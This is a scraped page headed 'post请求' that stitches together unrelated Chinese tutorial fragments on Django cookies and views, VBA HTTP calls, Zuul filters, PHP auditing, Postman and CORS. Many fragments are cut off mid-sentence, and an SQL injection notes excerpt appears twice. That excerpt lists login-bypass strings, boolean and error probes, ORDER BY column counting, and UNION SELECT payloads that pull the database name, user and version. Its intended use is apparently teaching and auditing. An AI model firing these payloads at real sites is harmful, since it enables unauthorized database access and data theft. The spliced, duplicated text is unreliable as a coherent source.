post请求

目录 Django基础八之cookie和session 一 会话跟踪 二 cookie 　　Cookie的由来 　　什么是Cookie 　　Cookie的原理 　　 查看Cookie 　　cookie图解 　　Cookie规范 　　Cookie与HTTP头 　　Cookie的覆盖 三 django中操作cookie 　　获取Cookie 　　设置Cookie 　　删除Cookie 四 session 五 django中操作session 　　Django中Session相关方法 　　Session详细流程解析 　　Session版登陆验证示例 　　Django中的Session配置 　　CBV中加装饰器相关 　　　　补充 Django基础八之cookie和session 本节目录 一 会话跟踪 　　 我们需要先了解一下什么是会话！可以把会话理解为客户端与服务器之间的一次会晤，在一次会晤中可能会包含多次请求和响应。例如你给10086打个电话，你就是客户端，而10086服务人员就是服务器了。从双方接通电话那一刻起，会话就开始了，到某一方挂断电话表示会话结束。在通话过程中，你会向10086发出多个请求，那么这多个请求都在一个会话中。 客户向某一服务器发出第一个请求开始，会话就开始了，直到客户关闭了浏览器会话结束。 　　 　　在一个会话的多个请求中共享数据，这就是会话跟踪技术

SQL注入笔记 服务器端程序将用户输入参数作为查询条件，直接拼接SQL语句，并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户： user() DB版本： version() 全局函数： @@datadir @@hostname @@VERSION @@version_compile_os 当前库： database() ASCII转字符： char() 连接字符串： CONCAT_WS(CHAR(32,58,32),user(),database()

SQL注入笔记 服务器端程序将用户输入参数作为查询条件，直接拼接SQL语句，并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户： user() DB版本： version() 全局函数： @@datadir @@hostname @@VERSION @@version_compile_os 当前库： database() ASCII转字符： char() 连接字符串： CONCAT_WS(CHAR(32,58,32),user(),database()

概要 VBA 的应用场景基本都还是在单机应用, 随着 Web 应用的风靡, 以及浏览器越来越强大, 单机类的应用逐渐没落. 虽然 Web 应用越来越多, 功能和体验也越来越好, 但是 Excel 依然有很强的生命力, 毕竟 Web 页面上的表格再强大, 也没有 Excel 那么方便易用. Excel 经过这么多年的积累, 不仅有很大的用户基础, 对表格类数据的处理几乎已经到极致. 如果能够以 Excel 本身作为 UI, 通过 VBA 来连接 Excel 和后端服务, 使它成为 Web 页面的辅助, 而不是强行在 Web 页面实现 Excel 表格的各种功能, 应该能有事半功倍的效果. 前后端分离已经是目前的主流, 只要能够通过 VBA 访问后端的 API, 并解析后端返回的数据(一般是 JSON 格式), 就能让 Excel 成为 Web 页面的辅助, 高效的处理表格类数据. VBA httplib 库的简单实现 为了能和后端 API 交互, 需要实现一个简单的 httplib 库, 便于在各个 VBA 工程中复用. 根据目前自己的需求, 这个简单的 httplib 库暂时完成以下几个功能: 能够发送 GET 请求 能够发送 POST 请求 能够解析请求返回的 JSON 数据 POST 请求中可以带 JSON 格式的参数 请求的 header 中可以加入 jwt token 信息

文章目录 简介 Filter 类型 Zuul 原生 Filter 自定义 Filter Filter 小例 简介   Zuul 的核心逻辑是由一系列紧密配合工作的 Filter 来实现的，它们能够在进行 HTTP 请求或者响应的时候执行相关操作。可以说，没有 Filter 责任链，就没有如今的 Zuul，更不可能构成功能丰富的 网关 。基本上你想要在网关实现的功能都要与 Filter 有关。它是 Zuul 中最为开放与核心的功能。 Zuul Filter 的主要特性有以下几点： Filter 的类型 ：Filter 的类型决定了此 Filter 在 Filter 链中的执行顺序。可能是路由动作发生前，可能是路由动作发生时，可能是路由动作发生后，也可能是路由过程发生异常时。 Filter 的执行顺序 ：同一种类型的 Filter 可以通过 flterOrder() 方法来设定执行顺序。一般会根据业务的执行顺序需求，来设定自定义 Filter 的执行顺序。 Filter 的执行条件 ：Filter 运行所需要的标准或条件。 Filter 的执行效果 ：符合某个 Filter 执行条件，产生的执行效果。   Zuul 内部提供了一个动态读取、编译和运行这些 Filter 的机制。Filter 之间不直接通信，在请求线程中会通过 RequestContext 来共享状态，它的内部是用

对于php代码审计我也是从0开始学的，对学习过程进行整理输出沉淀如有不足欢迎提出共勉。对学习能力有较高要求，整个系列主要是在工作中快速精通php代码审计，整个学习周期5天 ，建议花一天时间熟悉php语法。 我是直接phpstudy2019一键搭建小白首选 所谓工欲善其事必先利其器，找一款适合自己的php开发工具自行百度搭建，我用的是phpstrom . 初级篇主要讲 1. php历史版本漏洞。 2. 变量配置缺陷。 3. 函数缺陷。 4. 弱语言缺陷。 PHP配置漏洞 我们要熟知php各版本漏洞 Register_globals 全局变量注册开关 在该选项为on情况下，会直接把用户GET，POST等方式提交的参数注册成全局变量并初始化值为参数对应的值 Php小于4.2.3默认打开 5.3废弃 5.4移除 Allow_url_include 是否允许包含远程文件 Php 5.2 后默认设置off Magic_quotes_gpc 魔术引号自动过滤 会自动在get post,cookie 变量对单引号，双引号，反斜杠，空字符的前面加反斜杠 缺陷不会过滤$_SERVER 变量 Php5.3后废弃，5.4移除 小于4.2.3 默认打开 Magic_quotes_runtime 魔术引号自动过滤 和上面一样 却是对从数据库取出的数据进行转义 防止二次注入 同样在5.4取消 Safe_mode

前言： Postman是一款功能强大的网页调试与发送网页HTTP请求的Chrome插件。 接口请求流程 一、get请求 GET请求：点击Params，输入参数及value，可输入多个，即时显示在URL链接上，所以，GET请求的请求头与请求参数如在接口文档中无特别声明时，可以不填。 get请求示例 GET响应：右上角显示响应HTTP状态码、请求的耗时。 get响应示例 需特别注意的是注意区别HTTP状态码与响应正文中的状态码，只有HTTP状态码是200时，才代表这个接口请求是正确的，这个是HTTP协议定义的，而响应正文的状态码，是程序员自已定义的，可以是200，也可以定义为其它值，是为了让接口使用者去区分正常数据与异常数据。 状态码与响应码不一致 二、POST请求 1、POST请求一：表单提交 先看下图POST表单提交示例： 表单提交示例 上图示例中设置了请求方法，请求URL，请求参数，但没有设置请求头。有一个要明确的点是，请求头中的Content-Type与请求参数的格式之间是有关联关系的。 Content-Type与请求参数的格式之间的关联 当选择x-www-form-urlencoded的参数方式后，postman自动的帮我们设置了Content-Type，所以不需要我们人工干预，这就是使用一款流行工具的好处，把一些基础点都帮我们处理了。 2、POST请求二：json提交

1 Django基础一之web框架的本质 Django 、Flask 这些就是Python语言的web 框架。 1.1web框架的本质 Web应用本质上就是一个 socket服务端 ，而用户的浏览器就是一个 socket客户端。 1.1.1什么是 Web 服务器？ 平时我们都是通过浏览器（比如Chrome，Firefox等）上网的，当我们在浏览器的地址栏里输入地址后，会得到一个网页。 这个网页就是 web 服务器返回给我们的，而浏览器就称为客户端，当我们输入网址并按下回车后，就像web服务器发送了一个web请求。 这种模式成为 B/S 模式 ,即 Browse / Server 模式 在浏览器中输入地址、按回车后，按下F12 就是看到如下信息 下面就让我们来目睹整个过程吧 建立连接：客户机通过TCP/IP协议建立到服务器的TCP连接。 请求过程：客户端向服务器发送HTTP协议请求包（Request），请求服务器里的资源文档。 应答过程：服务器向客户机发送HTTP协议应答包（Response），如果请求的资源包含有动态语言的内容，那么服务器会调用动态语言的解释引擎负责处理“动态内容”，并将处理得到的数据返回给客户端。由客户端解释HTML文档，在客户端屏幕上渲染图形结果。 关闭连接：客户机与服务器断开。 这里Request 和 Response 都需要遵守 HTTP 协议，关于

目录 一Django的视图函数view 二CBA和FBV 三使用Mixin 四 给视图加装饰器 4.1使用装饰器装饰FBV 4.2使用装饰器装饰CBV 五request对象 六 response对象 6.1JsonResponse对象 一Django的视图函数view ​ 一个视图函数（类），简称视图，是一个简单的Python 函数（类），它接受Web请求并且返回Web响应。 ​ 响应可以是一张网页的HTML内容，一个重定向，一个404错误，一个XML文档，或者一张图片。 　　无论视图本身包含什么逻辑，都要返回响应。代码写在哪里也无所谓，只要它在你当前项目目录下面。除此之外没有更多的要求了——可以说“没有什么神奇的地方”。为了将代码放在某处，大家约定成俗将视图放置在项目（project）或应用程序（app）目录中的名为 views.py 的文件中。 一个简单的视图 下面是一个以HTML文档的形式返回当前日期和时间的视图： from django.http import HttpResponse import datetime def current_datetime(request): now = datetime.datetime.now() html = "<html><body>It is now %s.</body></html>" % now return

withCredentials 属性 上面说到，CORS请求默认不发送Cookie和HTTP认证信息。如果要把Cookie发到服务器，一方面要服务器同意，指定Access-Control-Allow-Credentials字段。 出现这个报错信息很可能是你在前端设置了withCredentials = true;你可以去掉这个设置也可以参考下面两个博客 https://juejin.im/post/5c2490ba6fb9a049ff4e2eca https://blog.csdn.net/nlldwbiqjs/article/details/82887180 来源： https://www.cnblogs.com/chen55555/p/11584785.html